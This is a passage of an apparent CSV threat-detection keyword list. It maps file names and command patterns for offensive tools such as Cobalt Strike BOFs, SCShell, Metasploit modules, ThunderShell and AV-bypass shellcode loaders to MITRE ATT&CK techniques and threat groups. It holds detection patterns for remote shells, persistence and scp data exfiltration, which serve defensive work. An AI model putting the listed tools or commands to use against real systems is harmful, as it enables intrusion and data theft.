TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*schshell.cna*,offensive_tool_keyword,cobaltstrike,Fileless lateral movement tool that relies on ChangeServiceConfigA to run command,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Mr-Un1k0d3r/SCShell,1,1,N/A,10,10,1241,228,2023-07-10T01:31:54Z,2019-11-13T23:39:27Z -*schtask_callback*,offensive_tool_keyword,cobaltstrike,A Visual Studio template used to create Cobalt Strike BOFs,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/securifybv/Visual-Studio-BOF-template,1,1,N/A,10,10,210,46,2021-11-17T12:03:42Z,2021-11-13T13:44:01Z -*SchTaskBackdoor.*,offensive_tool_keyword,SharPersist,SharPersist Windows persistence toolkit written in C#.,T1547 - T1053 - T1027 - T1028 - T1112,TA0003 - TA0008,N/A,N/A,Persistence,https://github.com/fireeye/SharPersist,1,0,N/A,10,10,1150,233,2023-08-11T00:52:09Z,2019-06-21T13:32:14Z -*schtasks /query /v /fo LIST*,greyware_tool_keyword,schtasks,view detailed information about all the scheduled tasks.,T1053.005 - T1082,TA0004 - TA0007,N/A,N/A,Discovery,N/A,1,0,N/A,8,10,N/A,N/A,N/A,N/A -*schtasks_elevator*,offensive_tool_keyword,cobaltstrike,The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/ElevateKit,1,1,N/A,10,10,812,205,2020-06-22T21:12:24Z,2016-12-08T03:51:09Z -*schtasks_exploit *,offensive_tool_keyword,cobaltstrike,The Elevate Kit demonstrates how to use third-party privilege escalation attacks with Cobalt Strike's Beacon payload.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rsmudge/ElevateKit,1,0,N/A,10,10,812,205,2020-06-22T21:12:24Z,2016-12-08T03:51:09Z -*schtasksabuse.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*SchTasksImplant*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*schtquery * full*,offensive_tool_keyword,bruteratel,A Customized Command and Control Center for Red Team and Adversary Simulation,T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047,TA0002 - TA0003,N/A,N/A,C2,https://bruteratel.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*scout aws --profile default -f*,greyware_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*scout azure --cli*,greyware_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*scp * *@*:*,greyware_tool_keyword,scp,Detects the use of tools that copy files from or to remote systems,T1041 - T1105 - T1106,TA0002 - TA0008 - TA0010,N/A,N/A,Data Exfiltration,https://attack.mitre.org/techniques/T1105/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*scp *@*:* *,greyware_tool_keyword,scp,Detects the use of tools that copy files from or to remote systems,T1041 - T1105 - T1106,TA0002 - TA0008 - TA0010,N/A,N/A,Data Exfiltration,https://attack.mitre.org/techniques/T1105/,1,0,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*screen /dev/ttyACM0 115200*,greyware_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*screen_spy.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*screengrab.exe*,offensive_tool_keyword,deimosc2,DeimosC2 is a Golang command and control framework for post-exploitation.,T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007,TA0011,N/A,N/A,C2,https://github.com/DeimosC2/DeimosC2,1,1,N/A,10,10,1004,158,2023-07-15T05:34:10Z,2020-06-30T19:24:13Z -*screenshot_inject *,offensive_tool_keyword,mythic,A .NET Framework 4.0 Windows Agent,T1021 - T1021.002 - T1022 - T1032 - T1043 - T1055 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1140 - T1204 - T1205,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/MythicAgents/Apollo/,1,0,N/A,10,10,401,83,2023-08-17T14:46:04Z,2020-11-09T08:05:16Z -*screenspy.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*Screetsec*,offensive_tool_keyword,Github Username,github username hosting post exploitation tools,N/A,N/A,N/A,N/A,POST Exploitation tools,https://github.com/Screetsec,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*screetsec/Microsploit*,offensive_tool_keyword,BruteSploit,Fast and easy create backdoor office exploitation using module metasploit packet . Microsoft Office . Open Office . Macro attack . Buffer Overflow,T1587 - T1588 - T1608,N/A,N/A,N/A,Exploitation tools,https://github.com/screetsec/Microsploit,1,1,N/A,N/A,5,430,133,2017-07-11T16:28:27Z,2017-03-16T05:26:55Z -*screetsec/Pateensy*,offensive_tool_keyword,Pateensy,payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy,T1025 T1052,N/A,N/A,N/A,Exploitation tools,https://github.com/screetsec/Pateensy,1,1,N/A,N/A,2,132,64,2017-01-26T12:02:56Z,2016-03-21T07:29:38Z -*screetsec/Sudomy*,offensive_tool_keyword,Sudomy,Sudomy is a subdomain enumeration tool to collect subdomains and analyzing domains performing automated reconnaissance (recon) for bug hunting / pentesting,T1595 - T1046,TA0002,N/A,N/A,Reconnaissance,https://github.com/screetsec/Sudomy,1,1,N/A,N/A,10,1718,352,2023-09-19T08:38:55Z,2019-07-26T10:26:34Z -*screetsec/Vegile*,offensive_tool_keyword,Sudomy,Ghost In The Shell - This tool will setting up your backdoor/rootkits when backdoor already setup it will be hidden your spesisifc process.unlimited your session in metasploit and transparent. Even when it killed. it will re-run again. There always be a procces which while run another process.So we can assume that this procces is unstopable like a Ghost in The Shell,T1587 - T1588 - T1608,N/A,N/A,N/A,Exploitation tools,https://github.com/screetsec/Vegile,1,1,N/A,N/A,7,686,175,2022-09-01T01:54:35Z,2018-01-02T05:29:48Z -*--script broadcast-dhcp-discover*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*script/xor-bin.py*,offensive_tool_keyword,PE-Obfuscator,PE obfuscator with Evasion in mind,T1027 - T1055 - T1140 - T1564.003 - T1027.002,TA0006 - TA0002,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/PE-Obfuscator,1,1,N/A,N/A,2,196,38,2023-04-25T04:58:12Z,2023-04-25T04:00:15Z -*scripthost_uac_bypass*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*scripts*Remote-WmiExecute.*,offensive_tool_keyword,ThunderShell,ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.,T1021.002 - T1573.002 - T1001.003,TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Mr-Un1k0d3r/ThunderShell,1,1,N/A,10,10,759,254,2023-03-29T21:57:08Z,2017-09-12T01:11:29Z -*scripts*Search-EventForUser.ps1*,offensive_tool_keyword,ThunderShell,ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. HTTPS options should be used to provide integrity and strong encryption.,T1021.002 - T1573.002 - T1001.003,TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Mr-Un1k0d3r/ThunderShell,1,1,N/A,10,10,759,254,2023-03-29T21:57:08Z,2017-09-12T01:11:29Z -*ScriptSentry-main.zip*,offensive_tool_keyword,ScriptSentry,ScriptSentry finds misconfigured and dangerous logon scripts.,T1037 - T1037.005 - T1046,TA0005 - TA0007,N/A,N/A,Credential Access,https://github.com/techspence/ScriptSentry,1,1,N/A,7,1,44,3,2023-08-16T19:32:24Z,2023-07-22T03:17:58Z -*ScRunBase32.exe*,offensive_tool_keyword,cobaltstrike,BypassAV ShellCode Loader (Cobaltstrike/Metasploit),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/scrun,1,1,N/A,10,10,177,76,2019-07-27T07:10:08Z,2019-07-21T15:34:41Z -*ScRunBase32.py*,offensive_tool_keyword,cobaltstrike,BypassAV ShellCode Loader (Cobaltstrike/Metasploit),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/scrun,1,1,N/A,10,10,177,76,2019-07-27T07:10:08Z,2019-07-21T15:34:41Z -*ScRunBase64.exe*,offensive_tool_keyword,cobaltstrike,BypassAV ShellCode Loader (Cobaltstrike/Metasploit),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/scrun,1,1,N/A,10,10,177,76,2019-07-27T07:10:08Z,2019-07-21T15:34:41Z -*ScRunBase64.py*,offensive_tool_keyword,cobaltstrike,BypassAV ShellCode Loader (Cobaltstrike/Metasploit),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/scrun,1,1,N/A,10,10,177,76,2019-07-27T07:10:08Z,2019-07-21T15:34:41Z -*scshell*XblAuthManager*,offensive_tool_keyword,cobaltstrike,Fileless lateral movement tool that relies on ChangeServiceConfigA to run command,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Mr-Un1k0d3r/SCShell,1,1,N/A,10,10,1241,228,2023-07-10T01:31:54Z,2019-11-13T23:39:27Z -*SCShell.exe*,offensive_tool_keyword,cobaltstrike,Fileless lateral movement tool that relies on ChangeServiceConfigA to run command,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Mr-Un1k0d3r/SCShell,1,1,N/A,10,10,1241,228,2023-07-10T01:31:54Z,2019-11-13T23:39:27Z -*scshell.py*,offensive_tool_keyword,cobaltstrike,Fileless lateral movement tool that relies on ChangeServiceConfigA to run command,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Mr-Un1k0d3r/SCShell,1,1,N/A,10,10,1241,228,2023-07-10T01:31:54Z,2019-11-13T23:39:27Z -*scshellbof.c*,offensive_tool_keyword,cobaltstrike,Fileless lateral movement tool that relies on ChangeServiceConfigA to run command,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Mr-Un1k0d3r/SCShell,1,1,N/A,10,10,1241,228,2023-07-10T01:31:54Z,2019-11-13T23:39:27Z -*scshellbof.o*,offensive_tool_keyword,cobaltstrike,Fileless lateral movement tool that relies on ChangeServiceConfigA to run command,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - 